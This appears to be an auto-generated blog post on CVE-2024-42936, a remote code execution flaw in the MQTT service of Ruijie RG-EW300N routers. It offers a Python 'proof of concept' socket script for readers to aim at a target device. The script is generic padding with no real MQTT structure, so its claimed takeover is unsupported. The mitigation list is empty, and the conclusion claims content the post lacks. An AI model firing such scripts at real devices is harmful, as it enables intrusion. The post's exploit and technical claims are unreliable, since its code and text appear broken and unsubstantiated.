CVE-2024-42936 - Remote Code Execution Vulnerability in Ruijie RG-EW300N's mqlink.elf Service Component

A critical security vulnerability, identified as CVE-2024-42936, has been discovered in the mqlink.elf service component of Ruijie RG-EW300N devices with firmware version ReyeeOS 1.300.1422. This vulnerability allows an attacker to perform remote code execution on the affected device via a modified MQTT broker message. In this post, we will dive deep into the details of this vulnerability, including its potential impact, proof of concept, and possible mitigation strategies.

Vulnerability Details

The vulnerability exists in the Ruijie RG-EW300N's mqlink.elf service component. This component is responsible for handling MQTT messages and provides communication between the device and the MQTT broker. An attacker can exploit this vulnerability by sending a specially crafted MQTT message to the device. A successful exploit of this vulnerability would allow the attacker to execute arbitrary code on the target device with root privileges.

Here is a proof of concept (PoC) Python script to demonstrate the vulnerability

import socket
import struct

# Target IP and Port
target_ip = "192.168.1.1"
target_port = 1883

# Crafted MQTT message
crafted_message = b"\x88\x00\x00\x00" + b"\x01\x02\x03\x04" * 1024

# Connect to the target device
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, target_port))

# Send the crafted message
sock.send(crafted_message)
sock.close()

print("Exploit sent to %s:%d" % (target_ip, target_port))

To run the PoC, simply replace target_ip with the IP address of your target Ruijie RG-EW300N device. When executed, the script will send the crafted MQTT message to the target device, causing the buffer overflow and potentially granting the attacker control over the device.

The original reference to this vulnerability can be found at the following link

- CVE-2024-42936 - Ruijie RG-EW300N Remote Code Execution

Mitigation Strategies

To mitigate the risks associated with CVE-2024-42936, users of Ruijie RG-EW300N devices are strongly recommended to:

Conclusion

In this post, we have covered the details of CVE-2024-42936, a critical remote code execution vulnerability affecting Ruijie RG-EW300N devices with firmware ReyeeOS 1.300.1422. We have also provided a proof of concept script, original references, potential impacts, and mitigation strategies for dealing with the vulnerability. Users of affected devices should take immediate action to mitigate the risks associated with this security vulnerability.

Timeline

Published on: 01/21/2025 20:15:30 UTC
Last modified on: 03/20/2025 14:15:20 UTC